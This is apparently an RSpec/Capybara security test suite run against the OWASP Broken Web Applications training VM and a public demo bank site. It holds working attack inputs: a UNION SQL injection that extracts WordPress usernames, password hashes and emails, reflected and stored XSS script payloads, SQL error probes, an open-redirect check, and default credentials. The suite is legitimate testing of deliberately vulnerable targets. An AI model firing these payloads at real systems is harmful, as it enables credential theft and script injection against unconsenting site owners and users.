Capybara/RSpec tests that exercise known vulnerabilities (missing authorization, SQL injection, reflected and stored XSS, open redirect, login-form autocomplete) in the OWASP Broken Web Applications (BWA) VM, plus one external demo target.
# encoding: utf-8
#http://code.google.com/p/owaspbwa/wiki/ProjectSummary
#http://sourceforge.net/apps/trac/owaspbwa/report/1
require 'capybara/rspec'
# A real browser is needed: the XSS checks below wait for JavaScript alerts and
# the autocomplete check sends raw key presses, neither of which rack_test can do.
Capybara.default_driver = :selenium
# No in-process application is started; every example drives a live host set via
# Capybara.app_host inside each describe. The SQLi/XSS payloads are real -- only
# point this at targets you are authorised to attack.
Capybara.run_server = false
#page = Capybara::Session.new(:selenium)
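describe 'OWASP Broken Web App: Wordpress', :type=>:request, :app=>'owasp_broken' do
  # All paths below are relative to the BWA VM; this is the only place to change the host.
  before(:all) { Capybara.app_host = 'http://owaspbwa' }

  # NOTE(review): the nested groups tag themselves with :type=>'authorization',
  # 'autocomplete' and 'sqli', reusing the :type key that capybara/rspec keys
  # its DSL inclusion on (:type=>:request above). It still works because nested
  # groups inherit the parent's included modules, but a dedicated key such as
  # :vuln would avoid the collision. Left unchanged so existing --tag filters
  # keep matching.

  context "Without authenticating", :type=>'authorization' do
    specify "I should be able to access the blog" do
      visit '/wordpress/'
      within('head title') do
        page.should have_content('Broken WordPress')
      end
    end

    specify "I should be able to access the login page" do
      visit '/wordpress/wp-login.php'
      within('head title') do
        page.should have_content('Login')
      end
    end

    # Anonymous access to wp-admin must bounce to the login form; landing on a
    # page titled 'Login' is taken as that bounce.
    specify "I should not be able to access the WordPress Admin page" do
      visit '/wordpress/wp-admin/'
      within('head title') do
        page.should have_content('Login')
      end
    end
  end

  context "After logging in as 'admin'," do
    # Default BWA credentials. 'log' / 'pwd' / 'submit' are the field and button
    # names of the bundled (old) WordPress login form.
    before(:each) do
      visit '/wordpress/wp-login.php'
      fill_in "log", :with => "admin"
      fill_in "pwd", :with => "admin"
      click_button "submit"
    end

    specify "the page should list 'admin' as the authenticated user" do
      # Scoped to the first <strong> on the post-login page -- fragile if the theme changes.
      within('strong') do
        page.should have_content('admin')
      end
    end

    specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do
      visit '/wordpress/wp-admin/'
      within('head title') do
        page.should have_content('Dashboard')
      end
    end

    specify "I should be able to access the User Admin page", :type=>'authorization' do
      visit '/wordpress/wp-admin/users.php'
      within('head title') do
        page.should have_content('Users')
      end
    end

    context 'After logging out, visiting the login page, and pressing the down arrow', :type=>'autocomplete' do
      # NOTE(review): despite the context name no logout is performed here; the
      # before(:each) above has just signed in as admin when this example runs.
      # Form autocomplete is a browser feature, so this drives real key presses
      # and assumes the Selenium browser profile has already saved a username
      # for this form (e.g. from an earlier run); the sleeps wait for the
      # suggestion dropdown to appear.
      specify "I shold see autocompleted usernames" do
        visit '/wordpress/wp-login.php'
        # The finding is that the login form does not opt out of autocompletion;
        # check the attribute directly as well as the browser behaviour.
        find_field('log')['autocomplete'].to_s.downcase.should_not eq('off')
        fill_in 'log', :with =>''
        find_field('log').native.send_keys(:arrow_down)
        sleep 1
        find_field('log').native.send_keys(:arrow_down)
        sleep 1
        find_field('log').native.send_keys(:return)
        sleep 1
        content = find_field('log').value
        content.should_not be_nil
        content.should_not eq('')
        # Was a bare `content.length > 0` expression, which asserted nothing.
        content.length.should > 0
      end
    end
  end

  context "After logging in as 'user'," do
    # Low-privilege BWA account, used to show the authorization boundary below.
    before(:each) do
      visit '/wordpress/wp-login.php'
      fill_in "log", :with=> "user"
      fill_in "pwd", :with=> "user"
      click_button "submit"
    end

    specify "the page should list 'user' as the authenticated user" do
      within('strong') do
        page.should have_content('user')
      end
    end

    specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do
      visit '/wordpress/wp-admin/'
      within('head title') do
        page.should have_content('Dashboard')
      end
    end

    # The one negative authorization case: a subscriber must not reach user management.
    specify "I should be not able to access the User Admin page", :type=>'authorization' do
      visit '/wordpress/wp-admin/users.php'
      page.should have_content('You do not have sufficient permissions to access this page.')
    end
  end

  context 'On the ss_load.php page,', :type=>'sqli' do
    # Error-based detection: an unescaped quote in ss_id surfaces the MySQL error text.
    context 'When I enter a single quote into the ss_id URL parameter,' do
      before(:all) do
        visit "/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id='"
      end

      specify 'The application should respond with an SQL error message' do
        page.should have_content("You have an error in your SQL syntax")
      end
    end

    # UNION-based extraction: the concat() renders every wp_users row as
    # "<user_login>:<user_pass>:<user_email>" inside the spreadsheet markup.
    context 'When I enter an SQL Injection Payload,' do
      before(:all) do
        visit %q|/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--|
      end

      specify "I should see the 'admin' account details" do
        within('#s1_spreadsheetBars') do
          # The previous expectation was the literal text '[email protected]', which
          # looks like an address-obfuscation artifact rather than a real
          # e-mail and could not match. The 'admin:' prefix produced by the
          # payload's concat() does not depend on the stored address.
          page.should have_content('admin:')
        end
      end
    end
  end
end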
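describe 'OWASP Broken Web App: AWStats', :type=>:request, :app=>'owasp_broken' do
  # NOTE(review): the two XSS contexts target GTD-PHP, not AWStats; only the
  # awredir.pl case is AWStats. The describe name is kept so existing filters
  # match, but the group would read better split in two.

  # This group used to rely on the WordPress group's before(:all) having set the
  # host, so it broke when run on its own (or after the Freebank group, which
  # points app_host elsewhere). Set it explicitly.
  before(:all) { Capybara.app_host = 'http://owaspbwa' }

  context "When entering an XSS payload into the 'editList.php' page, ",:type=>'xss' do
    # Reflected XSS via the listTitle query parameter; a native alert only
    # fires if the payload reached script context, which is what is asserted.
    before(:all) do
      visit %q|/gtd-php/editList.php?listTitle=<script>alert('Achieved JavaScript Context')</script>|
    end

    specify 'An alert box should be displayed' do
      # Selenium-specific: switch_to.alert raises if no alert is open.
      expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
    end
  end

  context "When entering an XSS payload into the 'newChecklist.php' page", :type=>'stored_xss' do
    # This persists the payload in the target's database; it will keep firing
    # on every later load of listChecklist.php until it is removed.
    before(:all) do
      visit '/gtd-php/newChecklist.php'
      fill_in 'title', :with => %q|"><script>alert(1)</script>|
      fill_in 'description', :with => 'asdf'
      click_button 'Add Checklist'
    end

    specify 'I should see an alert box after submitting the form' do
      expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
    end

    context "When visiting the 'listChecklist.php' page, " do
      specify 'I should see an alert box' do
        # The original never navigated here and so re-checked whatever page the
        # previous example left behind. The *stored* part of the finding is only
        # shown by the payload firing on a fresh load of the listing.
        visit '/gtd-php/listChecklist.php'
        expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
      end
    end
  end

  context "When visiting the 'awredir.pl' page and specifying a 'url' of 'google.com', ", :type=>'open_redirect' do
    # Needs outbound network access from the browser host.
    before(:all) { visit '/awstats/awredir.pl?url=google.com' }

    specify "The browser should be redirected to 'google.com'" do
      # A title check alone could be satisfied by content served from the
      # target itself; an open redirect is only demonstrated if the browser
      # actually left the application host.
      page.current_url.should_not include('owaspbwa')
      within('head title') do
        page.should have_content('Google')
      end
    end
  end
end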
describe "Freebank", :type=>:request, :app=>'freebank' do
  # External, publicly hosted demo target rather than the OWASP BWA VM; it
  # needs Internet access and its response text may change without notice.
  before(:all) { Capybara.app_host = 'http://zero.webappsecurity.com' }

  # Error-based SQL injection probe on the login form: a stray quote in the
  # user id is expected to surface a verbatim ODBC/Access error message.
  # (The :type=>'freebank' tag reuses the :type metadata key -- see the note
  # in the WordPress group.)
  context 'When submitting a single quote in the user id field of the login page,', :type=>'freebank' do
    before(:all) do
      visit '/'
      fill_in 'password', :with=>'asdf'
      fill_in 'login', :with=>'asdf\''
      click_button 'Access Accounts'
    end

    specify 'I should see a database error message displayed' do
      odbc_error = '[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression'
      page.has_content?(odbc_error).should be_true
    end
  end
end